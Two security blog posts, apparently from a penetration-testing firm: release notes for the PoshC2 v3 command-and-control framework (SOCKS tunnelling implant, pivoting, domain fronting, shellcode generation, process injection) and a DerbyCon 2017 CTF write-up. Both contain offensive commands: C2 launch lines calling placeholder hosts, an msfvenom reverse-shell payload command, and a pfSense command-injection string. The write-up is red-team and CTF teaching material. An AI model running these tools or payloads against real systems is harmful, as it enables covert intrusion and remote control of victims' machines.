PoshC2 v3 with SOCKS Proxy (SharpSocks)


We’ve been working on quite a few changes since the release of PoshC2 v2, our public Command & Control framework, back in December 2016. In this blog we’ll talk about the top changes and feature improvements. If you want to view all the changes, we’ve now added a CHANGELOG.md to the repository.

Some headline features are:

  • C# reverse HTTPS tunnelling SOCKS proxy (SharpSocks)
  • Daisy implant now supports multi layered pivoting (no limit on hops)
  • Domain fronting for C2 comms
  • C++ reflective DLL, utilising UnmanagedPowershell and PoshC2’s Custom EXE
  • Shellcode generator, utilising @monoxgas‘s new sRDI tool we can generate shellcode on the fly from the Reflective DLL created in C++
  • Stable migration utilising Inject-Shellcode which uses our newly created shellcode
  • New AutoRuns that allow the user to create commands that run when a new implant is initiated
  • Pre/Post Implant Help – The Implant-Handler window now has a pre and post help menu which allows you to do various tasks when you have no implant, such as autoruns
  • A new port scanner module



One of the most important tools for a red teamer is the SOCKS Proxy. This enables the creation of a tunnel between two machines such that any network traffic forwarded through it appears to have originated from the machine at the end of it. Once a foothold has been gained on a machine, a SOCKS proxy can be deployed between the operators machines and the target in order to access subnets, machines and services that would not normally be directly accessible. This includes being able to RDP to another machine or even to browse the corporate intranet.

SOCKS support is built into most modern browsers and cURL. However, to use tools like rdesktop or nmap, proxychains on Linux can be used to tunnel the traffic. In order to simulate ProxyChains when using Windows, software such as ProxyCap (http://www.proxycap.com/) can be used.

Previously, if tools like PoshC2 or Empire were used to gain a foothold and SOCKS is required then another implant, such as Meterpreter, would have to be deployed in order to provide the ability to tunnel TCP traffic into the internal network. We arrived at the decision that deploying a full implant just for SOCKS support is overkill and while e.g. Meterpreter is very good, it is also can be noisy and is not an appropriate representation of most sophisticated threat actors TTPs. Since PoshC2 is our publicly available C2, we wanted to add this ability for the wider world too, just like we have in our internal tooling.

When started, the implant will connect back via an HTTP request to the specified host. This is known as the command channel.  By default (and this timing can be changed via the --beacon flag in the implant) the server will be contacted every 5 seconds to check if there are any connections that need to be opened or closed on the implant side. Once the command channel has successfully connected for the first time, the SOCKS listener port is opened on the server; this port is what proxychains or proxycap should be configured to connect to.

Once this has started you can then start your web browser or RDP etc. and connect to the internal network. Every time the browser etc. opens a connection to the SOCKS port, a job is queued for the command channel and the implant on the default 5 second timer will connect up check to see if there any new connections that need to be made or closed. If one does need to be opened, this will be then be assigned its own session identifier and traffic will flow and be tunnelled over HTTP/S on separate requests.

A typical usage scenario is shown in the diagram above. A foothold has been gained on a machine with internet access, but only via HTTP/S, and RDP needs to be used to access the RDP Host (credentials for this box have, of course, been obtained). The SharpSocks server is started and so is the implant. Proxychains is then configured by the operator to point to the SOCKS port. Rdesktop is then started and traffic is tunnelled via HTTPS to the implant host, where the connection is then made to the RDP host.

Design Goals

The project originated as a way to provide SOCKS proxy functionality to Nettitude’s PoshC2 project.  The design goals were as follows:

  • Ability to operate as part of another implant or its own separate instance
  • Communication over HTTP/S
  • Minimal CPU/memory load on implanted machine
  • Encrypted transport
  • Configurable locations within a HTTP request for the payload
  • Proxy aware
  • IPv6 support
  • Ease of integration into other projects
  • Easing overriding functionality by a consumer such as encryption or transport method


The best usage experience for this currently is via PoshC2.

SharpSocks, written by Rob Maslen (@rbmaslen), utilises a C# AssemblyLoad to run a socks4a proxy on the implant, calling back to a server which can be either located on the same PoshC2 instance or on a different host. The most convenient way to deploy this is via the same PoshC2 host, but on a separate port. The comms can be split via the Apache Rewrite rules if you’re using a C2 proxy on the Internet. It may also be a good idea to use a separate host for this traffic as you may have to speed up comms to 1 or 2 second beacons and therefore utilise a separate proxy host, but they can all point back to the same PoshC2 instance in the back end.

The comms URLs for both PoshC2 and SharpSocks can now be fully customised when first setting the server up. These can then be added to an apache.conf file located in the root of the PoshC2 folder.

A sample set of Apache Rules are below:

To deploy SharpSocks all you need to do is run the following command from within a live implant. This will create a new encryption key and subsequent channel and start both the implant and SharpSocks server for you:

SharpSocks -Uri https://www.c2.com:443 -Beacon 2000 -Insecure

Here is a simple video that shows this being used:

This can be used as a standalone program outside of PoshC2 too. The code and PowerShell script can be found below:

The next few sections walk you through using SharpSocks in a standalone manner.

There are two Visual Studio Solutions which build both the server and the implant. These are both built initially as DLL’s, however the solutions also contain projects for executables that wrap the DLLs and allow for testing of the functionality. These exe’s are not designed to be deployed in a production scenario.

The DLLs are designed to be either launched via the test executables or via the helper functions within the DLLs themselves, enabling other usage via other projects/languages. Also included within the binaries directory is also the PowerShell script that is used by PoshC2.

Server App (SharpSocksServerTestApp)

Running the server binary with the --help flag, the following options are listed. In order to launch, the only value that is required is the encryption key.  This should be supplied in Base64; the default algorithm is AES-256.

An example of this running would be the following

This will start the HTTPS server (HTTPS requires that a certificate is installed via netsh) listening on https://c2proxy.on.the.internet. The communications are encrypted via the key NqeEk7h4pe7cJ6YGB/4q3jHZ5kp64xsghwNwjYUFD0g=, the command channel is identified by bc448036-f957-45d9-b0e7-997b4121034f. The session identifier would be transmitted via the ASP.NET_SessionId cookie and smaller payloads via the __RequestVerificationToken cookie.

Server DLL (SharpSocksServerDLL)

Within the SharpSocksServer.dll is a class called SharpSocksServer.Source.Integration.PSSocksServer which contains a single method called CreateSocksController. This method is designed as a static helper to easily enable the creation and starting of the SharpSocksServer. In order to be used, the DLL/Assembly will first need to be loaded the CreateSocksController method called and then the Start method called on the value returned. For usage of this it’s best to look in the PowerShell script included with this project.

Implant Test App (SharpSocksImplantTestApp)

An example:

This will start the implant which will attempt to connect to https://c2proxy.on.the.internet using the system proxy settings. The communications are encrypted via the key NqeEk7h4pe7cJ6YGB/4q3jHZ5kp64xsghwNwjYUFD0g=, the command channel is identified by bc448036-f957-45d9-b0e7-997b4121034f. The session identifier would be transmitted via the ASP.NET_SessionId cookie and smaller payloads via the __RequestVerificationToken cookie. The command channel will attempt to connect every 7.5 seconds to the SharpSocks server.

Implant DLL (SharpSocksImplant.dll)

Within the SharpSocksImplant.dll is a class called SocksProxy.Classes.Integration.PoshCreateProxy which contains a single method called CreateSocksController. This method is designed as a static helper to easily enable the creation and starting of the implant. In order to be used, the DLL/Assembly will first need to be loaded the CreateSocksController method called and then the Start method called on the value returned. As with the SharpSocks Server, as an example of usage of this it’s best to look in the PowerShell script included with this project.


To enable multi-layered pivoting in PoshC2 we have created a module called Invoke-DaisyChain. This must be run as an administrator on a compromised host within the compromised network. This will essentially create an HTTP proxy server running on the host to transport PoshC2 comms traffic from the internal network out to the PoshC2 instance instead of going direct with CreateProxyPayload.

To start the DaisyChain server, simply run this command with your C2 configuration. Proxy settings are optional as is the domain fronting URL:

Invoke-DaisyChain -name jason -daisyserver -port 9999 -c2port 443 -c2server https://www.c2domain.com -domfront aaa.cloudfront.net -proxyurl -proxyuser dom\test -proxypassword pass

This will create a variety of payloads that are specific to this pivot server. Therefore, if you run the new payloads (called ‘jason’ in this instance) it would attempt to connect to the proxy port running on this host, rather than going direct to the Internet. To execute these payloads remotely, you can use any of the lateral execution methods built into PoshC2 or any of your custom lateral movement methods.

There is no limit on the number of times you can pivot into a network. However, if any of the machines in the chain get restarted for any reason, the entire chain will die. This is worth noting when performing pivoting within a network using Daisy Chaining.


PoshC2 can now use domain fronting for comms. There is a caveat to this; the host must have .NET v4.0.30319 installed and usable to the PowerShell instance. However, if the host does not have this version of the CLR installed it will default back to the underlying CDN hostname, for example cloudfront.net or azureedge.net. The way we perform domain fronting in PoshC2 is by adding the Host header to the web requests.

This is a much stealthier option for comms as you can utilise hostnames with better reputation without needing to buy new domains and obtain reputation yourself. There are many examples of these on the Internet, but as a proof of concept this example uses ‘d0.awsstatic.com’.


The new pre-implant help menu allows you to configure various auto-runs, double check the server configuration and make and significant changes to the C2 server. It also allows you to test your configuration by issuing PwnSelf to obtain an implant.

Other commands that can be altered are C2 default beacon time, Clockwork SMS API key and mobile number for text message alerts of new implants.


We have now implemented the concept of Auto-Runs. This allows the user of PoshC2 to automate various tasks when an implant first comes in. A few use cases of this could be:

  • auto migrate from PowerShell
  • capturing a screenshot for situational awareness
  • install persistence

Essentially, any command that can be issued within PoshC2 can be turned into an Auto-Run.

This menu can be found on the pre-implant help menu. An example of this menu has been shown below:


The auto migrate from PowerShell feature has been added and by default will start another process in netsh.exe unless otherwise stated by the ‘-newprocess’ parameter. This utilises unmanaged PowerShell via the C++ Reflective DLL.


The C++ Reflective Dll utilises the concept from the unmanaged PowerShell code by @tifkin_.

We have created a .NET binary that is loaded by creating an instance of the CLR (v2.0.50727 or v4.0.30319) in runtime and patching the implant over the top when creating a new payload. This is done by creating a blank variable in the C++ code and overwriting the code where 5000 A’s exist. Once compiled we find the location of this code and add the offset to the PatchDLL function as shown below.

In addition, PoshC2 converts the newly created reflective DLL into Shellcode via @monoxgas’s sRDI PowerShell module. This module converts Reflective DLLs into position independent shellcode.

The Reflective DLL and new Shellcode has enabled PoshC2 to be more flexible in its execution and deployment. Many other tools will allow for a reflective DLL or shellcode to be loaded. Take for example, the MS17-010 eternal blue exploit written in Powershell. This exploit takes shellcode as a parameter to execute if the host is successfully exploited; having Shellcode as a payload format allows this to be possible.

Also for migration, we now use either the reflective DLL or the Shellcode to squirt the implant into another process. When first starting PoshC2 it will create both the reflective DLL’s as shown below.

  • Posh_x64.dll
  • Posh_x86.dll

To test these out, they can be called via rundll32:

  • Posh-shellcode_x64.bin
  • Posh-shellcode_x86.bin

To test these out, they can be called via the new Inject-Shellcode script or by using ‘migrate’ in the implant window:


@rbmaslen has created a super fast portscanner written in C# which has been ported to PoshC2 using the AssemblyLoad function rather than AddType. This is not to obfuscate the code at all, but in case you’re not aware the add-type function in PowerShell actually compiles the code on the fly and touches disk in the interim. This is why both the SharpSocks and Portscanner modules have been written to use AssemblyLoad instead.

The port scanner can take various parameters, but mostly we like the fact you can go into ‘super fast’ mode which allows you to set the maximum queries per second (-maxQueriesPS). This is similar to masscan’s rate parameter. This is good when your intention is not to be stealthy and you want to perform quick port scanning against a target. An example has been shown below.

On the other hand, when performing Red Teaming the ultimate aim is usually to be stealthy and we have implemented the option for delaying the portscan. For example, if you set the max queries per second (-maxQueriesPS) to 1 and the delay (-Delay) to 10, it will attempt to connect to each port with a 10 second delay hopefully bypassing any host or network IDS detection. An example of this has been shown below.


Go and download the latest version of PoshC2 with SharpSocks and let us know what you think!

DerbyCon 2017 CTF Write Up

The excellent Derbycon 2017 has just come to an end and, just like last year, we competed in the Capture The Flag competition, which ran for 48 hours from noon Friday to Sunday. As always, our team name was SpicyWeasel. We are pleased to say that we finished in first place, which netted us a black badge.

We thought that, just like last year, we’d write up a few of the challenges we faced for those who are interested. A big thank you to the DerbyCon organizers, who clearly put in a lot of effort in to delivering a top quality and most welcoming conference.



Navigating to this box, we found a new social media application that calls itself “The premiere social media network, for tinfoil hat wearing types”. We saw see that it was possible to create an account and login. Further, on the left hand side of the page it was possible to view profiles for those who had already created an account.

Once we had created an account and logged in, we were redirected to the page shown below. Interestingly it allowed you to upload tar.gz files, and tar files have some interesting properties… By playing around with the site, we confirmed tar files that were uploaded were indeed untar’d and the files written out to the /users/ path.

One of the more interesting properties of tar is that, by default, it doesn’t follow symlinks. Rather, it will add the symlink to the archive. In order to archive the file and not the symlink, you can use the --h or --dereference flag, as shown below.

Symlinks can point to both files and directories, so to test if the page was vulnerable we created the following archive pointing to:

  • the /root dir
  • /etc
  • the known_hosts file in /root/.ssh (on the off chance…)

The upload was successful and the tar was extracted.

Now to find out if anything was actually accessible. By navigating to /users/zzz/root/etc/passwd we were able to view the passwd file.

Awesome – we had access. We stuck the hash for rcvryusr straight into hashcat and it wasn’t long before the password of backup was returned and we were able to login to the box via SSH.

We then spent a large amount of time attempting privilege escalation on this Slackware 14.2 host. The organisers let us know, after the CTF had finished, that there was no privilege escalation. We thought that we would share this with you, so that you can put your mind at rest if you did the same!


Before we proceed with this portion of the write up, we wanted to note that this challenge was a 0day discovered by Rob Simon (@_Kc57) – props to him! After the CTF finished, we confirmed that there had been attempted coordinated disclosure in the preceding months. The vendor had been contacted and failed to provide a patch after a reasonable period had elapsed. Rob has now disclosed the vulnerability publicly and this sequence of events matches Nettitude’s disclosure policy. With that said…

We hadn’t really looked too much at this box until the tweet below came out. A good tip for the DerbyCon CTF (and others) is to make sure that you have alerts on for the appropriate Twitter account or whatever other form of communication the organizers may decide to use.

Awesome – we have a 0day to go after. Upon browsing to the .299 website, we were redirected to the /KB page. We had useful information in terms of vendor and a version number, as highlighted below.

One of the first things to try after obtaining a vendor and version number is to attempt to locate the source code, along with any release notes. As this was a 0day there wouldn’t be any release notes pointing to this issue. The source code wasn’t available, however it was possible to download a trial version.

We downloaded the zip file and extracted it. Happy days – we find it’s a .NET application. Anything .NET we find immediately has a date with a decompiler. The one we used for this was dotPeek from https://JetBrains.com. There are a number of different decompilers for .NET (dnSpy being a favourite of a lot of people we know) and we recommend you experiment with them all to find one that suits you.

By loading the main HelpDesk.dll into dotPeek, we are able to extract all the source from the .dll by right clicking and hitting export to Project. This drops all the source code that is able to be extracted into a folder of your choosing.

Once the source was exported we quickly ran through it through Visual Code Grepper (https://github.com/nccgroup/VCG) which:

“has a few features that should hopefully make it useful to anyone conducting code security reviews, particularly where time is at a premium“

Time was definitely at a premium here, so in the source code went.

A few issues were reported, but upon examining them further, they are all found to be false positives. The LoadXML was particularly interesting as although XMLDocument is vulnerable to XXE injection in all but the most recent versions of .NET, the vendor had correctly nulled the XMLResolver, mitigating the attack.

A further in depth review of the source found no real leads.

The next step was to look through all the other files that came with the application. Yes we agree that the first file we should have read was the readme but it had been a late night!

Anyway, the readme. There were some very interesting entries within the table of contents. Let’s have a further look at the AutoLogin feature.

The text implies that by creating an MD5 hash of the username + email + shared-secret, it may be possible to login as that user. That’s cool, but what is the shared secret?

Then, the tweet below landed. Interesting.

We tried signing up for an account by submitting an issue, but nothing arrived. Then, later on another tweet arrived. Maybe there was something going on here.

So, by creating an account and then triggering a Forgotten Password for that account, we received this email.

Interesting – this is the Autologin feature. We really needed to look into how that hash was created.

At this point we began looking into the how the URL was generated and located the function GetAutoLoginUrl() which was within the HelpDesk.BusinessLayer.VariousUtils class. The source of this is shown below.

As stated in the readme, this is how the AutoLogin hash was generated; by appending the username, email address and this case the month and day. The key here was really going to be that SharedSecret. We were really starting to wonder at this point, since the only way to obtain that hash was via email.

The next step was to try and understand how everything worked. At this point we started Rubber Ducky Debugging (https://en.wikipedia.org/wiki/Rubber_duck_debugging). We also installed the software locally.

Looking in our local version, we noticed that you can’t change the shared secret in the trial. Was it is same between versions?

One of the previous tweets started to make sense too.

The KB article leaked the username and email address of the admin user. Interesting, although it was possible to obtain the email address from the sender and, well, the username was admin…

We tried to build an AutoLoginUrl using the shared secret from our local server with no joy. Okay. Time to properly look at how that secret was generated.

Digging around, we eventually found that the AutoLoginSharedSecret was initialised using the following code.

This was looking promising. While the length of the shared secret this code generated was long enough, it also made some critical errors that allowed the secret to be recoverable.

The first mistake was to completely narrow the key space; uppercase A-Z and 2-9 is not good enough.

The second mistake was with the use of the Random class:

This is not random in the way the vendor wanted it to be. As the documentation states below, by providing the same seed will mean the same sequence. The seed is a 32bit signed integer meaning that there will only ever be 2,147,483,647 combinations.

In order to recover the key, the following C# was written in (you guessed it!) LinqPad (https://www.linqpad.net/).

The code starts with a counter of 0 and then seeds the Random class generating every possible secret. Each of this secrets is then hashed with the username, email, day and month to see if it matches a hash recovered from the forgotten password email.

Once the code was completed it was run and – boom – the secret was recovered. We should add that there was only about 20 mins to go in the CTF at this stage. You could say there was a mild tension in the air.

This was then used to generate a hash and autologin link for the admin user. We were in!

The flag was found within the assets section. We submitted the flag and the 8000 points were ours (along with another challenge coin and solidified first place).

We could finally chill for the last 5 mins and the CTF was ours. A bourbon ale may have been drunk afterwards!


While browsing the web root directory (directory listings enabled) on the web server, we came across a file called jacked.html. When rendered in the browser, that page references an image called turtles.png, but that didn’t show when viewing the page. There was a bit of a clue in the page’s title “I Like Turtles”… we guess somebody loves shells!

When viewing the client side source of the page, we saw that there was a data-uri for the turtle.png image tag, but it looked suspiciously short.

Using our favourite Swiss army tool of choice, LinqPad (https://www.linqpad.net/ – we promise we don’t work for them!), to Base64 decode the data-uri string, we saw that this was clearly an escape sequence. Decoding further into ASCII, we had a big clue – that looks a lot like shellcode in there.

The escape sequence definitely had the look of x86 about it, so back to LinqPad we go in order to run it. We have a basic shellcode runner that we sometimes need. Essentially, it opens notepad (or any other application of your choosing) as a process and then proceeds to alloc memory in that process. The shellcode is then written into that allocation and then a thread is kicked off, pointing to the top of the shellcode. The script is written with a break in it so that after notepad is launched you have time to attach a debugger. The last two bytes are CD 80 which translates to Int 80 (the System Call handler interrupt in Linux and a far superior rapper than Busta).

Attaching to the process with WinDbg and hitting go in LinqPad, the int 80 was triggered, which fired an Access Violation within WinDbg. This exception was then caught, allowing us to examine memory.

Once running WinDbg we immediately spotted a problem, int 80h but the Linux system call handler. This was obviously designed to be run under a different OS.  Oops.  Oh well, let’s see what we can salvage.

One point that is important to note is that when making a system call in Linux, values are passed through from user land to the kernel via registers. EAX contains the system call number then EBX, ECX, EDX, ESX and EDI take the parameters to the call in that order. The shellcode translates as follows. XORing a register with itself is used as a quick way to zero out a register.

What we saw here was that the immediate value 4 is being moved into the first byte of the EAX register (which is known as AL). This translates to the system call syswrite which effectively has the following prototype.

Based upon the order of registers above, this prototype and the assembly we see that EBX contains a value of 1 which is std out, ECX contains the stack pointer which is where the flag is located and EDX has a value of 12h (or 18) which corresponds to the length of the string.

So yes, had this been run on a Linux OS we would have had the flag nicely written to the console rather than an access violation, but all is not lost. We knew the stack contained the flag, so all we needed to do was examine what was stored within ESP register (Stack Pointer). In WinDbg you can dump memory in different formats using d and then the format indicated using a second letter. For example in the screenshot below, the first command in the screenshot is dd esp, which will dump memory in DWORD or 4 byte format (by default 32 of them returning 128 bytes of memory). The second command shown is da esp which starts dumping memory in ASCII format until it hits a null character or has read 48 bytes.


When browsing to the web server, we found the iLibrarian application hosted within a directory of the same name. The first two notable points about this site were that we had both a list of usernames in a drop down menu (very curious functionality) and, at the bottom of the page, was a version number. There was also the ability to create a user account.

When testing an off the shelf application the first few steps we perform are to attempt to locate default credentials, the version number and then obtain the source/binaries if possible. The goal here is an attempt to make the test as white box as possible.

A good source of information about recent changes to a project is the issues tab on GitHub. Sometimes, security issues will be listed. As shown below, on the iLibrarian GitHub site one of the first issues listed was “RTF Scan Broken”. Interesting title; let’s dig a little further.

There was a conversion to RTF error, apparently, although very little information was given about the bug.

We looked at the diff of the change. The following line looked interesting.

The next step was to check out the history of changes to the file.

The first change listed was for a mistyped variable bug, which didn’t look like a security issue. The second change looked promising, though.

The escaping of shell arguments is performed to ensure that a user cannot supply data such that it breaks out of the system command and starts performing the user’s action against the OS. The usual methods of breaking out including back ticks, line breaks, semi colons, apostrophes etc. This type of flaw is well known and is referred to as command injection. In PHP, the language used to write iLibrarian, the mitigation is usually to wrap any user supplied data in a call to escapeshellarg().

Looking at the diff of changes for the “escape shell arguments” change we can see that this change was to call escapeshellargs() on two parameters that are passed to the exec() function (http://php.net/manual/en/function.exec.php).

Viewing the version before this change, we saw the following key lines.

Firstly a variable called $temp_file is created. This is set to the current temporary path plus the value of the filename that passed during the upload of the manuscript file (manuscript is the name of the form variable). The file extension is then obtained from the $temp_file variable and if it is either doc, docx or odt, the file is then converted.

The injection was within the conversion shown in the third highlight. By providing a command value that breaks out, we should have command injection.

Cool. Time to try and upload a web shell. The following payload was constructed and uploaded.

This created a page that would execute any value passed in the cmd parameter. It should be noted that during a proper penetration test, when exploiting issues like this, predictable name such as test4.php should NOT be used, lest it be located and abused by someone else (we typically generate a multiple GUID name) and, ideally, there should be some built in IP address address restrictions. However, this was a CTF and time was of the essence. Let’s hope no other teams found our obviously named newly created page!

The file had been written. Time to call test4.php and see who we were running as.

As expected, we were running as the web user and had limited privileges. Still, this was enough to clean up some flags. We decided to upgrade our access to the operating system by using a fully interactive shell – obtained using the same attack vector.

Finally, we looked for a privilege escalation. The OS was Ubuntu 15.04 and one Dirty Cow later, we had root access and the last flag from the box.


This box had TCP port 80 and 10000 open. Port 80 ran a webserver that hosted a number of downloadable challenges, while port 10000 was what appeared to be Webmin.

Webmin was an inviting target because its version appeared to be vulnerable to a number of publicly available flaws that would suit our objective. However, none of the exploits appeared to be working. We then removed the blinkers and stepped back.

The web server on port 80 leaked the OS in its server banner; none other than North Korea’s RedStar 3.0. Aha – not so long ago @hackerfantastic performed a load of research on RedStar and if memory served, the results were not good for the OS. Sure enough…

A quick bit of due diligence on the exploit and then simply set up a netcat listener, ran the exploit with the appropriate parameters and – oh look – immediate root shell. Flag obtained; fairly low value, and rightfully so. Thanks for the stellar work @hackerfantastic!

Dup Scout

This box ran an application called Dup Scout Enterprise.

It was vulnerable to a remote code execution vulnerability, an exploit for which was easily found on exploit-db.

We discovered that the architecture was 32 bit by logging in with admin:admin and checking the system information page. The only thing we had to do for the exploit to work on the target was change the shellcode provided by the out of the box exploit to suit a 32 bit OS. This can easily be achieved by using msfvenom:

  • msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 EXITFUN=none -e x86/alpha_mixed -f python

Before we ran the exploit against the target server, we set up the software locally to check it would all work as intended. We then ran it against the production server and were granted a shell with SYSTEM level access. Nice and easy.


To keep some reddit netsecers in the cheap seats happy this year, yes we actually had to open a debugger (and IDA too). We’ll walk you through two of the seven binary challenges presented.

By browsing the web server, we found the following directory containing 7 different binaries. This write up will go through the x86-intermediate one.

By opening it up in IDA and heading straight to the main function, we found the following code graph:

Roughly, this translates as checking if the first parameter passed to the executable is -p. If so, the next argument is stored as the first password. This is then passed to the function CheckPassword1 (not the actual name, this has been renamed in IDA). If this is correct the user is prompted for the second password, which is checked by CheckPassword2. If that second password is correct, then the message “Password 2: good job, you’re done” is displayed to the user. Hopefully, this means collection of the flag too!

By opening the CheckPassword1 function, we immediately saw that an array of chars was being built up. A pointer to the beginning of this array was then passed to _strcmp along with the only argument to this function, which was the password passed as p.

We inspected the values going into the char array and they looked like lower case ASCII characters. Decoding these lead to the value the_pass.

Passing that value to the binary with the p flag, we got the following:

Cool, so time for the second password. Jumping straight to the CheckPassword2 function, we found the following at the beginning of the function. Could it be exactly the same as the last function?

Nope, it was completely different, as the main body of the function shown in the following screenshot illustrates. It looks a bit more complicated than the last one…

Using the excellent compiler tool hosted at https://godbolt.org/ it roughly translates into the following:

The method to generate the solution here was to adapt this code into C# (yes; once again in LinqPad and nowhere as difficult as it sounds), this time to run through each possible character combination and then check if the generated value matched the stored hash.

Running it, we found what we were looking for – @12345!) and confirmed it by passing it into the exe.

In order to get the flag just need to combine the_pass@12345!) which, when submitted, returned us 500 points.


The file arm-hard.binary contained an ELF executable which spelled out a flag by writing successive characters to the R0 register. It did this using a method which resembles Return Oriented Programming (ROP), whereby a list of function addresses is pushed onto the stack, and then as each one returns, it invokes the next one from the list.

ROP is a technique which would more usually be found in shellcode. It was developed as a way to perform stack-based buffer overflow attacks, even if the memory containing the stack is marked as non-executable. The fragments of code executed – known as ‘gadgets’ – are normally chosen opportunistically from whatever happens to be available within the code segment. In this instance there was no need for that, because the binary had been written to contain exactly the code fragments needed, and ROP was merely being used to obfuscate the control flow.

To further obfuscate the behaviour, each of the characters was formed by adding an offset to the value 0x61 (ASCII a). This was done from a base value in register R1 (calculated as 0x5a + 0x07 = 0x61):

For example, here is the gadget for writing a letter n to R0 (calculated as 0x61 + 0x0d = 0x6e):

and here is the gadget for a capital letter B:

The gadget addresses were calculated as offsets too, from a base address held in register R10 and equal to the address of the first gadget ( 0x853c). For example:

Here the address placed in R11 by the first instruction is equal to 0x853c + 0x30 = 0x856c, which as we saw above is the gadget for writing the letter n. The second instruction pushes it onto the stack. By stringing a sequence of these operations together it was possible to spell out a message:

The gadgets referred to above correspond respectively to the letters n, o, c, y, b, r, e and d. Since the return stack operates on the principle of first-in, last-out, they are executed in reverse order and so spell out the word derbycon (part of the flag). To start the process going, the program simply popped the first gadget address off the stack then returned to it:

The full flag, which took the form of an e-mail address, was found by extending this analysis to include all of the gadget addresses pushed onto the stack:

  • BlahBlahBlahBobLobLaw@derbycon.com


We noticed that a server was running IIS 6 and had WebDav enabled. Experience led us to believe that this combination meant it would likely be vulnerable to CVE-2017-7269. Fortunately for us, there is publically available exploit code included in the Metasploit framework:

The exploit ran as expected and we were able to collect a number of basic flags from this server.

Once we’d collected all of the obvious flags, we began to look at the server in a bit more detail. We ran a simple net view command and identified that the compromised server, NUKELANUCH, could see a server named NUKELAUNCHDB.

A quick port scan from our laptops indicated that this server was live, but had no ports open. However, the server was in scope so there must be a way to access it. We assumed that there was some network segregation in place, so we used the initial server as a pivot point to forward traffic.

Bingo, port 1433 was open on NUKELAUNCHDB, as long as you routed via NUKELAUNCH.

We utilized Metasploit’s built in pivoting functionality to push traffic to NUKELAUNCHDB via NUKELAUNCH. This was set up by simply adding a route, something similar to route add NUKELAUNCHDB 10 where 10 was the session number we wished to route through. We then started Metasploit’s socks proxy server. This allowed for us to utilize other tools and push their traffic to NUKELAUNCHDB through proxy chains.

At this stage, we made some educated guesses about the password for the sa account and used CLR-based custom stored procedures (http://sekirkity.com/command-execution-in-sql-server-via-fileless-clr-based-custom-stored-procedure/) to gain access to the underlying operating system on NUKELAUNCHDB.


From the HTTP response headers, we identified this host was running a vulnerable version of Home Web Server.

Some cursory research lead to the following exploit-db page:

It detailed a path traversal attack which could be used to execute binaries on the affected machine. Initial attempts to utilise this flaw to run encoded PowerShell commands were unsuccessful, so we had a look for other exploitation vectors.

The web application had what appeared to be file upload functionality, but it didn’t seem to be fully functional.

There was, however, a note on the page explaining that FTP could still be used for uploads, so that was the next port of call.

Anonymous FTP access was enabled, so we were able to simply log in and upload an executable. At this stage we could upload files to the target system and run binaries. The only thing missing was that we don’t know the full path to the binary that we’d uploaded. Fortunately, there was a text file in the cgi-bin detailing the upload configuration:

The only step remaining was to run the binary we’d uploaded. The following web request did the job and we were granted access to the system.

The flags were scattered around the filesystem and the MSSQL database. One of the flags was found on the user’s desktop in a format that required graphical access, so we enabled RDP to grab that one.


This challenge was based on a vulnerability discovered by Scott White (@s4squatch) shortly before DerbyCon 2017. It wasn’t quite a 0day (Scott had reported it to pfSense and it was vaguely mentioned in the patch notes) but there was very limited public information about this at the time of the CTF.

The box presented us with a single TCP port open; 443, offering a HTTPS served website. Visiting the site revealed the login page of an instance of the open source firewall software pfSense.


We attempted to guess the password. The typical default username and password is admin:pfsense; however this, along with a few other common admin: combinations, failed to grant us entry.

After a short while, we changed the user to pfsense and tried a password of pfsense, and we were in. The pfsense user provided us with a small number of low value flags.

At first glance, the challenge seemed trivial. pfSense has a page called exec.php that can call system commands and run PHP code. However, we soon realised that the pfsense user held almost no privileges. We only had access to a small number of pages. We could install widgets, view some system information – including version numbers – and upload files via the picture widget. Despite all this, there appeared to be very little in the way of options to get a shell on the box.

We then decided to grab a directory listing of all the pages provided by pfSense. We grabbed a copy of the software and copied all of the page path and names from the file system. Then, using the resulting list in combination with the DirBuster tool for automation, we tried every page to attempt to determine if there was anything else that we did have access to. Two pages returned a HTTP 200 OK status.

  • index.php – We already have this.
  • system_groupmanager.php – Hmm…

Browsing to system_groupmanager.php yielded another slightly higher value flag.

This page is responsible for managing members of groups and the privileges they have; awesome! We realised our user was not a member of the “admin” group, so we made that happen and… nothing. No change to the interface and no ability to access a page like exec.php.

A few hours were burned looking for various vulnerabilities, but to no avail. When looking at the source code, nothing immediately jumped out as vulnerable within the page itself, but then pfSense does make heavy use of includes and we were approaching the review using a pretty manual approach.

With time passing, a Google search for “system_groupmanager.php exploit” was performed and… urgh, why didn’t we do that straight away? Sleep deprivation was probably why.

There was a brief description of the vulnerability and a link to the actual pfSense security advisory notice:

A little more information was revealed, including the discoverer of the issue, who so happened to be sitting at the front on the stage as one of the CTF crew: Scott White from TrustedSec. Heh. This confirmed the likelihood that we were on the right track. However, he had not provided any public proof of concept code and searches did not reveal any authored by anyone else either.

The little information provided in the advisory included this paragraph:

“A command-injection vulnerability exists in auth.inc via system_groupmanager.php.

This allows an authenticated WebGUI user with privileges for system_groupmanager.php to execute commands in the context of the root user.”

With a new file as our target for code review and a target parameter, finding the vulnerability would have been considerably easier, but we can do better than that.

pfSense is an open source project which uses GitHub for their version control. By reviewing the commit history associated with auth.inc we quickly identified the affected lines of code, further simplifying our search for the vulnerability. Even better, the information contained within the footer of the security advisory revealed the patched version of the software (2.3.1), further narrowing the timeline of our search.

Having identified the particular line of code we could then understand the execution pathway:

  1. A numeric user ID is submitted within code contained in /usr/local/www/system_groupmanager.php
  2. This is passed to the local_group_set() function within /etc/inc/auth.inc as a PHP array.
  3. An implode() is performed on the incoming array to turn the array object into a single string object, concatenated using commas.
  4. This is then passed to a function called mwexec() without first undergoing any kind of escaping or filtering, which appears to call a system binary /usr/sbin/pw with the stringified array now part of its arguments.

In order to exploit this vulnerability, we needed to escape the string with a quote and type a suitable command.

Initial attempts made direct to the production box resulted in failure. As the injection was blind and didn’t return information to the webpage, we opted to use the ping command and then monitored incoming traffic using Wireshark to confirm success.

Despite having a good understanding of what was happening under the hood, something was still failing. We stood up a test environment with the same version of the pfSense software (2.2.6) and tried the same command. This lead to the same problem; no command execution. However, as we had administrative access to our own instance, we could view the system logs and the errors being caused.

Somehow, the /sbin/ping or the IP address were being returned as an invalid user id by the pw application, insinuating that the string escape was not being wholly successful and that /usr/bin/pw was in fact treating our command as a command line argument, which was not what we wanted.

Some more playing with quotes and escape sequences followed, before the following string resulted in a successful execution of ping and ICMP packets flooded into our network interfaces.

  • 0';/sbin/ping -c 1; /usr/bin/pw groupmod test -g 2003 -M '0

Attempting the same input on the live CTF environment also resulted in success. We had achieved command execution. At the time, no one had rooted the box and there was a need for speed if we wanted to be the winners of the challenge coin offered by @DerbyconCTF on Twitter.

